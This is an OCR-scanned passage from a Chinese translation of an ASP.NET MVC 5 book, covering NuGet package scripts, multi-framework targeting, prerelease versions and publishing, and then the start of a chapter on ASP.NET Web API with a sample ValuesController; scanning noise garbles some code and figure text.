Uninstallps! | 在 包 每 次 从 项 目 中 卸载 时 执行 。 这 对 于 NuGet 清除 包 的 操作 非常 有 用 


当 调 用 这 些 脚 本 时 ，NuGet 会 传递 进来 一 组 参数 ， 如 表 10-7 所 示 。 


表 10-7 NuGet PowerShell 脚本 的 参数 


名 称 dB xk 

SinstallPath. | 包 安 装 的 路 径 

$toolsPath 在 包 的 安装 目录 中 ，tools 目录 的 路 径 

$package 包 的 一 个 实例 

Sproject 包 安 装 到 的 项 目 。 在 init.psl 脚本 中 该 参数 的 值 为 null， 因 为 它 运行 在 解决 方案 级 别 


init.psl 脚本 非常 简单 ， 它 只 需要 导入 包含 真实 逻辑 的 PowerShell 代码 块 : 
param($installPath, $toolsPath, $package, $project) 
Import-Module (Join-Path $toolsPath MagicEightBall.psml) 


其 中 ， 第 一 行 代 码 声 明了 NuGet 在 调用 脚本 时 ， 将 传递 给 脚本 的 参数 。 
第 二 行 导 入 了 名 为 “MagicEightBall.psml” 的 模块 。 这 是 PowerShell 模块 脚本 ， 其 中 包 
含 了 准备 编写 的 新 命令 的 逻辑 。 正 如 上 面 所 描述 的 ， 该 模块 与 initpsl 脚本 位 于 同一 目录 下 ， 
也 在 tools 目录 下 。 这 正 是 需要 把 StoolsPath( 到 达 tools 目录 的 路 径 ) 和 模块 名 称 连接 起 来 ， 从 
而 得 到 模块 脚本 文件 完整 路 径 的 原因 。 
下 面 是 MagicEightBallpsml 的 源 代码 : 


$answers = "As I see it, yes", 
"Reply hazy, try again", 
"Outlook not so good" 
function Get-Answer($question) ( 
$rand - New-Object System.Random 
return $answers[$rand.Next(0, $answers.Length)] 
} 


Register-TabExpansion 'Get-Answer' G( 
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'question' = ( 
"Is this my lucky day?", 
"Will it rain tonight?", 
"Do I watch too much TV?" 


} 
Export-ModuleMember Get-Answer 


下 面 对 以 上 代码 做 一 下 解释 : 

e 第 一 行 代码 声明 了 可 能 的 答案 的 数组 。 真 实 的 神奇 8 号 球 游戏 有 20 种 可 能 的 答案 ， 
简单 起 见 ， 我 们 只 有 3 种 。 

e 下 个 代码 块 声明 了 一 个 名 为 Get-Answer 的 函数 。 这 是 向 包 管理 器 控制 台 添加 的 新 命 
令 。 它 生成 一 个 位 于 0-3 之 间 ( 包 含 0 而 不 包含 3) 的 随机 整数 ， 然 后 以 该 随机 数 作为 
数组 的 下 标 ， 返 回 该 下 标 对 应 的 答案 。 

e 下 一 段 代 码 通过 Register-TabExpansion 方法 为 新 命令 注册 选项 卡 扩展 。 这 是 一 个 为 函 
数 提供 类 似 于 智能 感知 的 选项 卡 的 非常 整洁 的 方式 。 第 一 个 参数 是 被 提供 选项 卡 扩 展 
的 函数 的 名 称 。 第 二 个 参数 是 字典 ， 用 来 为 函数 的 每 一 个 参数 提供 可 能 的 选项 卡 扩展 
值 。 字 典 中 的 每 一 个 条 目 都 有 一 个 对 应 于 参数 名 称 的 键 。 在 本 例 中 ， 我 们 只 有 一 个 参 
数 一 一 question。 每 一 个 问题 可 能 对 应 有 多 个 答案 。 尽 管 代码 示例 只 提供 了 三 种 可 能 
的 答案 ,但 是 函数 的 用 户 可 以 自由 地 提出 任何 问题 。 

e 最 后 一 行 代码 导出 Get-Answer 函数 。 这 就 使 得 该 函数 可 在 控制 台中 作为 一 个 公共 命 
令 来 调用 。 
现在 需要 做 的 就 是 打包 这 些 文件 ， 并 安装 包 。 为 使 这 些 脚本 能 够 运行 ， 必 须 把 它们 放 在 
包 的 tools 文件 夹 中 。 如 果 把 这 些 文件 拖 到 包 浏 览 器 (Package Explorer) 的 Contents 窗 格 一 一 后 | 
“ 包 浏览 器 的 用 法 ”一 节 将 讲 到 的 一 个 有 用 工具 , 系统 会 自动 地 提示 把 文件 放 在 tools 文件 夹 
中 。 如 果 正 在 使 用 NuGet.exe 创建 包 ， 需 要 把 这 些 文件 放 到 名 为 tools 的 文件 夹 中 。 

包 一 旦 创建 完成 ， 我 们 就 可 以 把 它 安装 到 本 机 中 进行 测试 。 把 该 包 放 在 一 个 合适 的 文件 

夹 中 ， 并 将 该 文件 夹 作 为 包 源 添加 到 供应 库 (feed) 中 。 包 安装 完毕 后 ， 在 包 管 理 器 控制 台 ， 可 
以 使 用 一 个 带 有 选项 卡 扩展 的 新 命令 ， 如 图 10-14 所 示 。 


Package source: nugetorg - € Default project: [WebApplication35 
PM» Get-Answer | 


"Is this my lucky day? 
"will it rain tonight?" 
Do | watch too much TV? 


100% ~ 
Error List Package Manager Console 


图 10-14 


一 旦 掌握 了 PowerShell 的 技巧 ， 快 速 地 创建 能 够 向 包 管 理 器 控制 台 添加 强大 新 命令 的 包 
就 非常 容易 了 。 现 在 我 们 只 是 接触 了 其 功能 的 冰山 一 角 而 已 。 
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10.3.9 框架 和 轮廓 定位 


许多 程序 集 都 是 基于 .NET Framework 的 某 一 个 具体 版 本 运行 的 。 例如， 可 能 有 一 个 库 的 
一 个 版 本 基于 的 平台 是 NET 2.0， 而 该 库 的 另 一 个 版 本 利用 的 却 是 NET4.0。 因 此 ,我 们 没 必 
要 为 每 个 版 本 都 单独 地 创建 一 个 包 。NuGet 支持 在 一 个 包 中 存放 同一 个 库 的 多 个 版 本 ， 只 不 
过 在 包 中 需要 用 不 同 的 文件 夹 存放 这 些 不 同 的 版 本 。 

当 NuGet 安装 包 中 的 程序 集 时 ， 它 会 检查 项 目 将 包 添加 到 的 目标 NET Framework 版 本 。 


然后 根据 项 目的 NET 版 本 , 选择 正确 的 程序 集 版 本 , 也 即 在 tb 3 C Wiss 
文件 夹 中 选择 正确 的 子 文件 夹 。 图 10-15 展 示 了 一 个 基于 NET see oma 
4 和 .NET 4.5 的 包 的 布局 示例 。 Debe md 

为 使 NuGet 能 为 基于 不 同 NET 平台 的 项 目 添加 正确 的 程 st 
序 集 版 本 ， 我 们 使 用 下 面 的 命名 约定 来 为 不 同 的 框架 版 本 指定 图 10.15 


程序 集 版 本 : 
libN(framework name} {version} 


HP, framework name 参数 值 只 有 两 种 选择 一 一 NET Framework 和 Silverlight。 我 们 习 
惯 于 使 用 这 两 种 框架 的 缩写 形式 一 一 net 和 sl. 

version 指 的 是 框架 的 版 本 。 为 简单 起 见 ， 可 省 略 点 字符 ， 因 此 ; 
net20 对 应 于 .NET 2.0 
net35 对 应 于 .NET 3.5 
net40 对 应 于 .NET 4 
net45 对 应 于 .NET 4.5 
sl4 对 应 于 Silverlight 4.0 

那些 没有 相关 框架 名 称 和 版 本 的 程序 集 将 直接 存储 在 lib 文件 夹 中 。 

当 NuGet 安装 含有 多 个 程序 集 版 本 的 包 时 , 它 会 试图 使 程序 集 的 框架 名 称 和 版 本 与 项 目 
的 目标 框架 和 版 本 相 匹 配 。 

如 果 找 不 到 精确 匹配 , NuGet 将 继续 查找 lib 文件 夹 中 的 下 一 个 子 文件 夹 ; 如 果 存 在 某 个 
文件 夹 的 框架 版 本 与 项 目 框架 相 匹 配 ， 并 且 它 的 最 高 版 本 号 小 于 或 等 于 项 目 框架 版 本 号 ， 那 
么 NuGet 就 匹配 成 功 。 

例如 ， 我 们 在 目标 为 NET Framework 3.5 的 项 目 中 安装 一 个 拥有 lib 文件 夹 结构 (包含 
net20 和 net40) 的 包 ，NuGet 就 会 选择 名 为 net20(.NET Framework 2.0) 的 文件 夹 中 的 程序 集 ， 
因为 它 的 最 高 版 本 仍然 小 于 等 于 3.5。 

NuGet 通过 在 文件 夹 末 尾 处 追加 一 个 破 折 号 和 轮廓 名 称 (可 以 使 用 + 连接 多 个 名 称 ), c 
持 定位 到 一 个 具体 的 框架 轮廓 : 


libN(framework name} {version} 


例如 ， 为 了 定位 .NET 4.5 中 用 于 Windows Store 应 用 、Silverlight 5 和 Windows Phone 8 的 
Portable 类 库 ， 我 们 需要 把 相应 的 程序 集 放 到 名 为 portable-net45+sl5+wp8+win8 的 文件 夹 中 。 

NuGet 支持 的 轮廓 包括 : 

e CF: Compact Framework 
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e Client: Client 轮廓 

e Full: Full 轮廓 

e WP: Windows Phone 

图 10-16 显 示 了 一 个 相对 复杂 的 例子 , Portable. MvvmLightLibs 包 使 用 它 来 支持 多 种 平台 。 


4 lib 


n=v4.5 
B (NETPortable Version-v0.O Profile net45 «sl5 «wpB «win 


10.3.00 MEHE 


默认 情况 下 ，NuGet 只 显示 “稳定 ” 包 。 然 而 ， 我 们 可 能 想 创建 下 一 个 大 发 布 包 的 测试 
版 本 ， 并 且 还 可 以 在 NuGet 上 找到 它 。 

NuGet 支持 预 发 布 包 的 概念 。 为 了 创建 预 发 布 版 本 ， 根 据 Semantic Versioning(SemVer) 
说 明 指 定 一 个 预 发 布 版 本 号 。 例如 , 为 了 创建 1.0 包 的 版 本 号 , 可 能 把 版 本 号 设置 为 1.0.0-beta。 
可 在 NuSpec 的 version 字段 中 设置 , 也 可 以 通过 AssemblyInformationalVersion 设置 (如 果 是 通 
过 项 目 来 创建 包 的 话 ): 


[assembly: AssemblyInformationalVersion("1.0.1-alpha")] 


如 果 需 要 更 多 地 了 解 版 本 号 和 SemVer， 请 参阅 NuGet 的 版 本 文档 ， 网 址 : 
http://docs.nuget.org/docs/Reference/Versioning。 

预 发 布 包 可 以 依赖 于 稳定 包 ， 但 稳定 包 不 能 依赖 于 预 发 布 包 。 这 样 做 的 原因 是 ， 当 有 人 
安装 稳定 包 时 ， 他 (或 她 ) 不 想 承担 预 发 布 包 的 额外 风险 。NuGet 让 我 们 选择 是 否 加 入 预 发 布 
包 和 它 所 固有 的 风险 。 

为 了 能 在 Manage NuGet Packages 对 话 框 中 安装 预 发 布 包 ， 我 们 需要 确保 选择 中 间 面 板 
下 拉 框 中 的 Include Prerelease， 而 不 是 Stable Only。 在 Package Manager Console 中 ， 可 在 
Install-Package 命令 中 使 用 -IncludePrerelease。 


104 发 布 包 


上 一 节 介绍 了 创建 包 的 方法 。 尽 管 创建 包 的 方法 很 有 用 ， 但 有 时 ， 我 们 更 需要 学 会 与 世 
界 分 享 自己 的 成 果 。 本 节 将 介绍 如 何 把 包 发 布 到 NuGet 库 。 


使 用 私有 的 NuGet 供应 库 

如 果 不 想 或 不 能 与 公众 共享 成 果 的 话 ， 仍 然 可 以 使 用 带 有 私有 供应 库 的 NuGet。 这 里 有 
几 个 很 好 的 选项 可 用 : 

(1) 通过 把 包 复 制 到 开发 计算 机 或 团队 文件 共享 中 ， 创 建 一 个 本 地 供应 库 。 

(2) 通过 将 NuGet Server 包 安装 到 一 个 使 用 Empty 模板 新 建 的 Web 应 用 程序 中 , 运行 自 
己 的 NuGet 服务 器 。 
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G) 使 用 私有 供应 库 托 管 服务 ， 如 MyGet (http://myget.org)。 这 些 服务 提供 了 访问 控制 和 
其 他 一 些 高 级 特性 ， 一 些 服务 是 免费 的 ， 一 些 则 是 收费 的 。 

对 于 这 三 种 选项 , 都 可 以 通过 Tools | Options | NuGet | Package Sources 对 话 框 来 添加 一 个 
新 的 包 源 ， 以 这 种 方式 访问 私有 供应 库 。 

在 NuGet 文档 中 可 找到 私有 NuGet 供应 库 的 更 多 信息 ， 网 址 为 : http://docs.nuget.org/ 
docs/creating-packages/hosting-your-own-nuget-feeds . 


10.4.1 发 布 到 NuGet.org 


默认 情况 下 ，NuGet 指向 一 个 网 址 为 https://nuget.org/api/v2/ 的 供应 库 。 

可 按照 以 下 步骤 ， 将 创建 的 包 发 布 到 供应 库 : 

(1) 在 http://nuget.org/ 站 点 上 创建 一 个 NuGet Gallery 账户 。 可 选择 的 方式 有 两 种 : 使 用 
Microsoft 账户 (原来 叫做 Windows Live ID), 或 者 使 用 用 户 名 和 密码 。 图 10-17 展 示 的 是 Nuget 
gallery 的 首页 。 


Bert /om 


What is NuGet? 

NuGet is the package manager for the 
Microsoft development platform 

including .NET The NuGet client tools 

provide the ability to produce and consume — , 
packages. The NuGet Gallery is the central 
package repository used by all package 

authors and consumers. 


Install NuGet B 


NuGet 2.7.2 Released 
w 


图 10-17 


D 登录 站 点 ， 然 后 单 击 用 户 名 。 进 入 一 个 新 页 面 ， 这 里 可 以 管理 账户 和 包 ， 如 图 10-18 
所 示 。 

(3) 单 击 Upload a Package 链接 ， 可 以 导航 到 上 传 页 面 ， 如 图 10-19 所 示 。 

单 击 Upload 按钮 ， 可 跳 转 到 另 一 个 页 面 ， 我 们 可 以 在 新 页 面 上 核对 包 的 元 数据 ， 如 图 
10-20 所 示 。 如 果 想 上 传 包 , 并 希望 上 传 的 包 在 搜索 结果 中 隐藏， 那么 只 需要 取消 选择 “Listed 
in Search Results ”选项 即 可 。 


注意 如 果 知 道 隐藏 包 的 ID 和 版 本 ， 我 们 仍 能 安装 隐藏 包 。 这 一 点 在 包 对 


外 公布 之 前 测试 中 非常 有 用 。 


265 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


T oee owe 


My NuGet.org Account 


42 Upload a Package. Œ Manage my Packages 
doa rd iie you package rome Mu cr camecad and dt package Aitals o Fare paca Da you ae riy 
vtr Verc ad miti retra Oe une patap mima uada 


Email Address  jegstossytbte eraicom Em 
Subscribed to Email Notifications. ^ SS 
Profile Picture EJ Moe 
Credentials 
Microsoft account. jon Galloway «jngslowayemicrosotcom» m 
Password Login Disabled. Em E 


图 10-18 


Upload Your Package 


EEE Cs] 


pr € 


Verify Details & Submit 


Verify Details 


(——————Ó—Ó 
mu y ree hangs Tan cct ert 


E ————MÁ— EE: 


Package ID 
Mec 
Version. 

License URL 


Mai Deco Partene 
C 
Listed in Search Results 
[es] 


图 10-20 
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(4) 核对 完 元 数据 后 ， 单 击 Submit 按钮 。 这 样 就 会 上 传 包 ， 并 把 页 面 重 定向 到 包 详 细 信 
息 的 页 面 。 


10.4.2 使 用 NuGet.exe 


NuGet.exe 可 用 来 创建 包 ， 如 果 它 还 可 以 用 来 发 布 包 ， 岂 不 是 更 好 ? 值得 庆幸 的 是 ， 使 
用 NuGet 的 NuGet push 命令 可 帮助 我 们 完成 这 个 任务 ,但 是 在 运行 命令 以 前 要 有 API EH 
在 NuGet 网 站 上 ， 单 击 用 户 名 导航 到 账户 页 面 。 上 面 的 页 面 可 以 用 来 管理 账户 ， 但 更 重 
要 的 是 ， 它 显示 出 了 访问 密 钥 ， 在 使 用 NuGetexe 发 布 包 时 这 是 必需 的 。 只 需要 向 下 滚动 一 
点 ， 就 可 以 看 到 API 密 钥 部 分 ， 如 图 10-21 所 示 。 
为 方便 起 见 ， 该 页 面 上 还 提供 了 一 个 Reset 按钮 ， 以 防 在 密 钥 泄露 时 , 重新 生成 新 的 API 
密 钥 ， 正 如 图 10-21 中 所 示 。 


Search Packages Q) 


My NuGet.org Account 


@ Upload a Package © Manage my Packages 


Email Address jongaloway@take-emailcom 
Subscribed to Email Notifications 


Profile Picture d 


Credentials 
Microsoft account Jon Galloway <jon galoway@microsof com> 
Password Login Disabled 


API Key: 3468[82-0e00-4684-Obce-ba371cc61104 © 


Contact Us Overview. Install 


图 10-21 


由 于 每 次 使 用 NuGet push 命令 时 都 需要 输入 API EH, 这 样 很 不 方便 。 然 而, 可 以 使 用 
NuGet 的 setApiKey 命令 存储 API 密 钥 ， 以 便 下 次 再 使 用 push 命令 时 ， 不 需要 重新 输入 API 
密 钥 。 图 10-22 展 示 了 setApiKey 命令 的 用 法 。 


:Ndev>nuget .exe setApiKey dc9bf8da-c367-4f92-8557-lecc8696c: 
ie API Key Kien i-c367-4f92-8557-1ecc8696c5b0' was sed 

for the Nucet y (https://www. ) and the symbol 
d eren n ri n e re Poya 


:\dev> 


图 10-22 
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API 密 钥 保存 到 漫游 配置 文件 Roaming profile) P HY NuGet.config 文件 中 ， 位 置 为 
\%APPDATA%\NuGet\NuGet.config- 
如 图 10-23 所 示 ， 保 存 API 密 钥 后 ， 发 布 一 条 命令 就 变 得 非常 容易 ， 只 需要 运行 push 命 
令 ， 并 指定 想 要 发 布 的 .nupkg 文件 即 可 。 
这 样 可 以 使 包 在 供应 库 中 立即 可 用 ， 因 此 ， 其 他 人 可 以 通过 对 话 框 或 控制 台 下 载 安装 。 
请 注意 ，nuget.org 站 点 表现 出 这 一 变化 ， 可 能 需要 花费 几 分 钟 时 间 。 


"B C Windowiytemi2emd exe 


pnuget push MusicCategorizer. 1 


2.0. nupkg 
ihe MuGet gallery (https:/, 


hing Wes 
-nu 
r packa age was ` pusi ished. 


:\dev> 


图 10-23 
10.4.3” 包 浏览 器 的 用 法 


包 创 建 完毕 后 ， 我 们 还 要 对 其 进行 检查 ， 以 确保 它 被 合适 地 打包 。 本 质 上 ， 所 有 NuGet 
包 只 是 zip 格式 的 压缩 文件 。 我 们 可 以 重 命名 该 文件 ,使 其 有 一 个 .zip 文件 扩展 名 ,然后 进行 
解压 缩 操 作 ， 并 查看 其 中 的 内 容 。 

除了 上 面 查看 包 内 容 的 方法 之 外 ， 还 有 一 种 更 简便 的 方法 : 使 用 包 浏 览 器 (Package 
Explorer)。 这 是 一 个 ClickOnce 应 用 程序 ， 可 在 此 网 址 下 载 : http;/npe.codeplex.com. 

安装 好 包 浏 览 器 后 ， 可 以 双击 任何 .nupkg 文件 来 查看 其 中 的 内 容 ， 甚 至 直接 从 NuGet 供 
应 库 打 开 包 。 图 10-24 显 示 了 在 NuGet 包 浏 览 器 中 打开 的 一 个 MVC 5 NuGet 包 。 


concerns and that gives you full control over markup. 


Release notes: 
Please visit htt-//go.microsoft.com/felink/"Linkid 389066 to 
view the release notes. 


图 10-24 
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此 外 ， 包 浏览 器 还 可 以 用 来 快速 编辑 包 文件 ， 甚 至 可 以 用 来 创建 一 个 全 新 的 包 。 例 如 ， 
单 击 Edit 菜单 并 选择 Edit Package Metadata 菜单 项 以 使 元 数据 处 于 可 编辑 状态 ， 如 图 10-25 
Brass 


CrazylerAspNet Mc 
my 
[Jon's version cf ASP.NET MVC. 


Microsoft Jon Galloway. 


Jon Galloway 


图 10-25 


可 将 文件 拖 到 Package contents 窗 格 中 的 合适 文件 夹 中 。 若 把 一 个 文件 拖 放 到 Package 
contents 窗 格 中 ， 但 没有 为 其 指定 任何 文件 夹 ， 此 时 包 浏 览 器 会 根据 文件 的 内 容 向 用 户 推 荐 
一 个 文件 夹 。 例 如 ， 它 会 推荐 把 程序 集 放 入 lib 文件 夹 中 ， 把 PowerShell 脚本 放 入 Tools X 
件 夹 。 

完成 对 包 的 编辑 之 后 ， 选 择 File | Save 菜单 选 
项 或 使 用 Cubes 组 合 键 来 保存 编辑 完成 的 .nupkg Erite your publish key 


文件 Provide the publish Url and the publish key associated with it. 
lá d: Crazylon.AspNet.Mvc Version: 0.0.1 


包 浏 览 器 也 提供 了 发 布 包 的 一 种 便捷 方式 ， 即 Pubish Urt [tps ww nogetarg 
通过 选择 File | Publish 菜单 。 打 开发 布 对 话 框 ， 如 Exp. E 
图 10-26 所 示 。 只 需要 输入 API 密 钥 ， 单 击 Publish 
按钮 ， 就 可 以 轻松 快速 地 将 包 发 布 到 供应 库 中 。 e [De 
图 10-26 


10.5 ”小结 


虽然 NuGet 作为 ASPNET MVC 5 的 完美 补充 ， 与 ASPNET MVC 5 一 起 发 布 ， 但 它 却 不 
局 限于 ASPNET MVC 项 目 。 NuGet 几乎 可 以 用 来 为 Visual Studio 中 所 有 类 型 的 项 目 安装 包 。 
比如 构建 Windows Phone 应 用 程序 时 ， 就 有 相应 的 一 组 NuGet 包 。 

但 当 创 建 ASPNET MVC 5 应 用 程序 时 , NuGet 绝对 是 一 个 强大 的 助手 。 它 可 为 我 们 下 载 
安装 许多 利用 了 ASPNET MVC 的 特定 内 置 特 性 的 包 。 

例如 ， 可 以 安装 AutofacMvc5 包 ， 该 包 可 以 作为 依赖 解析 器 自动 连接 Autofac 依赖 注入 
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库 。 安装 Glimpse.Mvc5 包 可 在 浏览 器 控制 台中 为 ASPNET MVC 应 用 程序 添加 端 到 端 调试 和 
诊断 功能 。 有 一 个 网 站 记录 了 社区 最 流行 的 、 用 于 ASPNET MVC 开发 的 NuGet 包 , 网 址 为 : 
http://nugetmusthaves.com/Category/MVC。 因为 NuGet 包 的 安装 和 和 镍 载 很 快 ， 所 以 找到 并 尝试 
NuGet 包 并 不 麻烦 。 

当 准 备 与 世界 分 享 自 己 的 库 时 ， 不 要 仅 把 它们 压缩 成 zip 文件 ， 放 在 网 络 上 ， 而 应 把 它 
们 转换 成 NuGet 包 ， 以 便 与 他 人 共享 。 


A1 


ASP.NET Web API 


本 章 主要 内 容 

e 定义 ASPNET Web API 

e 新 ASPNET Project 向 导 用 法 

e 编写 API 控制 器 

e 配置 Web 托管 和 自 托 管 的 API 
e Web API 和 MVC 路 由 对 比 

e SHARE 

e 过 滤 请 求 

e 启用 依赖 注入 

e 探索 API 编程 

e 跟踪 应 用 程序 

e ProductsController: 一 个 真实 案例 


本 章 代码 下 载 : 


从 以 下 网 址 的 Download Code 选 项 卡 中 ， 可 找到 


go/proaspnetmvc5。 下 面 的 文件 中 包含 了 本 章 的 完整 


项 目 。 


本 章 的 代码 下 载 : http://www.wrox.com/ 


在 20 世 纪 90 年 代 后 期 ，Web 开 发 通过 基于 服务 器 的 技术 ， 如 CGI、ASP、Java 和 PHP， 从 


静态 内 容 转 向 


了 动态 的 
应 用 程序 ， 特 别 是 IT 商业 应 上 


XMLHTTP 加 快 了 这 种 变化 ; 
从 浏览 器 应 用 程序 向 服务 器 传递 信息 。 


示 了 基于 浏览 


ASPNETMVC 的 早期 版 本 允许 使 


所 器 的 应 月 


上 程序 


程序 ， 从 桌面 移入 浏 


的 强大 功能 ， 


现在 整个 


世界 都 被 其 深 深 吸 引 。 


内 容 和 应 用 程序 的 开发 。 这 种 改变 又 引发 了 一 种 延续 至 今 的 变化 : 将 
览 器 。 随 Internet Explorer 5— 
当 把 XMLHTTP 与 JavaScript 结 合 在 一 起 使 用 时 ， 开 发 人 员 能 够 
Google 通 过 Google Maps 和 Gmail 等 应 用 程序 向 


起 发 布 的 


世界 展 


JsonResult 等 类 , 编写 行为 上 更 像 API 而 不 是 


网 


页 的 控 


制 器 。 但 是 ， 编 程 模型 上 一 直 存 在 一 点 不 一 致 ， 因 为 编写 API 的 人 会 希望 完全 控制 HTTP， 而 
ASPNET 的 抽象 让 这 种 完全 控制 变 得 很 困难 (ASPNET MVC 也 没有 解决 这 个 问题 )。 
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2011 年 发 布 的 ASPNET Web API 则 通过 一 个 一 流 的 、 以 HTTP 为 中 心 的 编程 模型 解决 了 这 
种 不 一 致 性 。 与 MVC 5 一 起 发 布 的 Web API2 则 为 API 开 发 人 员 提 供 了 大 量 新 的 和 改进 的 特性 。 


11.1 定义 ASP.NET Web API 

如 果 说 在 当今 数字 通信 领域 有 一 个 共同 点 ， 那 么 它 一 定 是 流行 的 HTTP。 我 们 不 仅 有 已 
经 使 用 超过 20 年 的 浏览 器 ， 我 们 许多 人 每 天 口袋 里 还 装 有 具有 很 强 计算 能 力 的 智能 手机 。 应 
程序 频繁 地 使 用 HTTP 和 JSON 作 为 通信 渠道 访问 主页 。 当 今 的 应 用 程序 如 果 不 能 提供 某 种 
形式 的 远程 访问 API 和 /或 手机 应 用 ， 就 不 能 认为 它 已 经 “完成 ”。 

当 MVC 开 发 人 员 请 求 给 他 们 一 些 建议 时 ， 笔 者 通常 会 说 :“ASPNET MVC 在 接收 表单 数 
据 生成 HTMLI 方面 功能 非常 强大 , ASPNET Web API 在 接收 和 生成 像 JSON 和 XML 等 结构 化 数 
据 方 面 功能 非常 强大 。 ”虽然 MVC 使 用 JsonResult 和 JSON 值 提供 器 提供 了 结构 化 的 数据 支持 ， 
但 在 某 些 API 重 要 应 用 方面 ， 它 仍 存在 不 足 之 处 ， 其 中 包括 以 下 方面 : 

e 基于 HTTP 动词 而 不 是 操作 名 称 调 度 操 作 

o 接收 和 生成 那些 面向 对 象 不 必要 的 内 容 ， 不 仅 是 XML， 还 有 像 图 片 、PDF 文件 或 

VCARD 这 样 的 内 容 
e 内 容 类 型 协商 , 它 支持 开发 人 员 接 收 和 生成 结构 化 内 容 , 而 独立 于 内 容 的 线 表示 (wire 
representation) 

e 在 ASP.NET 运行 时 堆栈 和 IIS Web 服务 器 以 外 托管 ，WCEF 一 直 做 了 很 多 年 

Web API 的 一 个 重要 部 分 是 ，API 团 队 费 尽 周折 地 尝试 ， 以 便 我 们 能 够 充分 利用 已 有 的 
ASPNET MVC 经 验 ， 比 如 控制 器 、 操 作 、 过 滤器 、 模 型 绑 定 器 和 依赖 注入 等 。 因 此 ， 这 些 相 
同 的 概念 大 多 以 相似 形式 出 现在 Web API 中 ， 这 使 得 结合 MVC 和 Web API 的 应 用 程序 看 起 来 
能 够 完美 地 整合 。 

由 于 ASPNET Web API 是 一 个 完全 独立 的 框架 ， 因 此 值得 用 一 本 书 讨论 。 本 章 内 容 介绍 
MVC 和 Web API 之 间 的 异同 ， 帮 助 我 们 决定 是 否 在 MVC 项 目 中 使 用 Web API. 


"- 


11.2 Web APIAT] 


ASPNET MVC 5 作为 Visual Studio 2013 的 
一 部 分 发 布 ， 同 时 也 作为 Visual Studio 2012 的 
附件 内 容 发 布 。 安 装 程序 包含 所 有 ASPNET 
Web API2 的 组 件 。 i 

如 图 11-1 所 示 ，New ASPNET Project 向 导 
允许 用 户 向 任何 项 目 类 型 添加 Web API 特 性 ， 


Es] 
wc 
5i 
Mobile 


si 


包括 Web Forms 和 MVC 应 用 程序 。 特 殊 项 目 类 
型 “Web API” 不 只 包含 Web API 二 进 制 文件 ， 

还 包括 一 个 样本 API 控 制 器 (ValuesController) 
和 一 些 能 为 Web API 自 动 生 成 帮助 页 面 的 MVC 
代码 。Visual Studio 中 的 File | New Item 菜 单项 


Add folders and core references for: 


口 wbFoms MVC SË Web API 


[Z Add unit tests 


Test project name: — [ProfessionalMVCS Tests 


图 11-1 
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以 及 全 新 的 Add | New Scaffolded Item 上 下 文 菜单 项 都 包含 了 空 Web API 控 制 器 的 模板 。 


11.3 ”编写 API 控 制 器 


Web API 与 MVC 一 同 发 布 ， 二 者 都 利用 了 控制 器 。 然 而 ，Web API 不 共享 MVC 的 模型 - 视 
图 -控制 器 设计 模式 。 它 们 都 拥有 将 HTTP 请 求 映射 成 控制 器 操作 的 概念 ， 但 不 是 使 用 输出 模 
板 和 视图 引擎 泻 染 结果 的 MVC 模 式 , Web API 直 接 把 结果 模型 对 象 作为 响应 来 泻 染 。 Web API 
和 MVC 的 许多 设计 区 别 都 源 于 二 者 框架 核心 的 差异 。 本 节 介 绍 编写 Web API 控 制 器 和 操作 的 


基础 内 容 。 


11.3.1 检查 示例 ValuesController 


程序 清单 11-1 包 含 当 我 们 使 用 Web API 项 目 模板 创建 项 目 时 得 到 的 ValuesController 类 。 我 


们 注意 到 第 一 个 区 别 是 ， 存 在 一 个 所 有 API 控 制 器 都 使 用 


程序 清单 11-1 ValuesController 


using System; 

using System.Collections.Generic; 
using System.Linq; 

using System.Net; 

using System.Net.Http; 

using System.Web.Http; 


namespace WebApiSample.Controllers 
{ 


的 基 类 : ApiController。 


public class ValuesController : ApiController { 


// GET api/values 

public IEnumerable«string» Get() ( 
return new string[] ( "valuel", 

H 


// GET api/values/5 

public string Get(int id) ( 
return "value"; 

} 


// POST api/values 


"value2" }; 


public void Post([FromBody] string value) { 


} 


// PUT api/values/5 


public void Put(int id, [FromBody] string value) { 


H 


// DELETE api/values/5 
public void Delete(int id) ( 
H 
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我 们 注意 到 的 第 二 个 区 别 是 ， 控 制 器 中 的 方法 返回 原始 对 象 ， 而 不 是 视图 ， 也 不 是 其 他 
操作 辅助 对 象 。 不 返回 由 HIMLI 组 成 的 视图 , API 控 制 器 返回 的 对 象 被 转换 成 请 求 要 求 的 最 佳 
匹配 格式 ， 后 面 将 介绍 这 一 过 程 的 原理 ， 以 及 Web API 2 中 新 增加 的 操作 结果 。 

第 三 个 差异 主要 源 于 MVC 和 Web API 传 统 调度 之 间 的 差异 。MVC 控 制 器 总 是 根据 名 称 调 
度 操作 ，Web API 控 制 器 默认 根据 HTTP 动词 调度 操作 。 虽 然 可 以 使 用 动词 重 写 特 性 ， 比 如 
[HttpGet] 或 [HttpPost]， 但 大 部 分 基于 动词 的 操作 可 能 遵照 操作 名 称 以 动词 名 称 开头 的 模式 。 
示例 控制 器 中 的 操作 方法 直接 以 动词 命名 , 但 也 有 操作 方法 以 动词 名 称 开 头 ， 也 就 是 说 ，Get 
动词 既 能 访问 Get 操 作 ， 也 能 访问 GetValues 操 作 。 

注意 ApiController 在 名 称 空间 SystemWebHttp 中 定义 ， 而 不 是 定义 在 名 称 空 间 
System.Web.Mvc 中 ， 但 是 Controller 定 义 在 System.Web.Mvc 名 称 空间 中 。 至 于 为 什么 这 样 ， 当 
我 们 学 习 自 托 管 后 ， 自 然 会 清楚 其 中 的 原因 。 


11.3.2 异步 设计 : IHttpController 


程序 清单 11-2 展 示 了 ApiController 接 口 。 如 果 与 MVC 的 Controller 类 对 比 ， 我 们 会 发 现 其 
中 的 一 些 概 念 是 相同 的 ， 比 如 控制 器 上 下 文 、ModelState、RouteData、Url 辅 助 方 法 和 User， 
一 些 概 念 相似 却 存在 差异 , 比如 Request 是 来 自 SystemNetHttp 的 HttpRequestMessage 而 不 是 来 
自 System.Web 的 HttpRequestBase， 一 些 概 念 是 缺失 的 ， 比 如 最 显著 的 Response 和 与 MVC 视 
相关 的 东西 。 还 要 注意 ， 由 于 新 增 的 操作 结果 方法 ， 这 个 类 的 公共 接口 比 第 1 版 增加 了 不 少 。 


程序 清单 11-2 ApiController 公 共 接 口 


namespace System.Web.Http ( 
public abstract class ApiController : IHttpController, IDisposable ( 
// Properties 


public HttpConfiguration Configuration ( get; set; } 
public HttpControllerContext ControllerContext ( get; set; } 
public ModelStateDictionary ModelState ( get; } 
public HttpRequestMessage Request ( get; set; } 
public HttpRequestContext RequestContext ( get; set; } 
public UrlHelper Url ( get; set; } 
